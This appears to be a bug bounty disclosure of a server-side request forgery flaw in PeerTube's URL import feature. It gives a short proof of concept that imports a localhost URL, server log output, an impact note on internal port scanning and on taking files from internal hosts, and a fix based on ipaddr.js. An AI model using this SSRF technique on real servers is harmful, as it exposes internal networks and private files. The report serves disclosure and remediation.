Server-Side Request Forgery (SSRF) in chocobozzz/peertube
Reported on
Dec 30th 2021
Description
There is an SSRF vulnerability in PeerTube: a registered user on the external network can make the server issue GET requests to hosts on its internal network via the Import With URL option.
Proof of Concept
Start a Python 3 HTTP server on port 8080:
python3 -m http.server 8080
Then import this URL:
http://127.0.0.1:8080
PeerTube issues the requests to localhost, as the server log shows:
gitpod /workspace/PeerTube $ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
127.0.0.1 - - [30/Dec/2021 10:03:31] "HEAD / HTTP/1.1" 200 -
127.0.0.1 - - [30/Dec/2021 10:03:31] "GET / HTTP/1.1" 200 -
Impact
External attackers can port scan and map the internal network. They can also escalate the SSRF to disclose videos stored on web servers on the internal network. For example, if a sensitive file is stored on another server at http://192.168.0.1/video.mp4, they can enter that URL and the video is imported and revealed.
Recommended Fix
The https://www.npmjs.com/package/ipaddr.js/v/1.1.0 package can be used to determine whether an IP address is public or private, instead of trying to enumerate every private IP range by hand.
var ipAddr = require('ipaddr.js')

// BAD: each of these ranges should be rejected by the import feature
console.log(ipAddr.parse("127.0.0.1").range())            // loopback
console.log(ipAddr.parse("192.168.0.1").range())          // private
console.log(ipAddr.parse("::ffff:7f00:2").range())        // ipv4Mapped (127.0.0.2 wrapped in IPv6)
console.log(ipAddr.parse("fd12:3456:789a:1::1").range())  // uniqueLocal

// GOOD: a public address, the only range the import feature should accept
console.log(ipAddr.parse("142.251.12.138").range())       // unicast

Only unicast is good.
References
Found an improper access control bug here https://huntr.dev/bounties/80aabdc1-89fe-47b8-87ca-9d68107fc0b4/